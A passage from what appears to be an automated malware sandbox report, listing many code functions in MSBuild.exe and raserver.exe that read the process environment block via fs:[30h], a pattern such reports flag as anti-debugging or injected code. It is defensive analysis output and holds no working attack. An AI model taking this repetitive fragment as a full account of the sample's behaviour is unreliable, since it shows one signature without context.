          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01507D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01523D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01563540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01593D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0156A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01598DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015A4496 mov eax, dword ptr fs:[00000030h] (11 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0150F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0157FF10 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015B070D mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0151A70E mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014E4F2E mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0151E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0150B73D mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_01567794 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014F7E41 mov eax, dword ptr fs:[00000030h] (6 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015AAE44 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0150AE73 mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0151A61C mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014EC600 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_01518E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0159FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_01528EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0159FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_014F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_0157FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  Code function: 1_2_015B0EA5 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04856CF0 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A740D mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04891C06 mov eax, dword ptr fs:[00000030h] (14 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04856C0A mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0480BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0480A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0486C450 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04802581 mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047FC577 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0480FD9B mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A05AC mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04801DB5 mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047E3D34 mov eax, dword ptr fs:[00000030h] (13 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04856DC9 mov eax, dword ptr fs:[00000030h] (5 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04856DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0489FDE2 mov eax, dword ptr fs:[00000030h] (4 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04888DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_047ED5E0 mov eax, dword ptr fs:[00000030h] (2 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0489E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_0485A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04804D3B mov eax, dword ptr fs:[00000030h] (3 hits)
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_048A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe  Code function: 6_2_04813D43 mov eax, dword ptr fs:[00000030h]
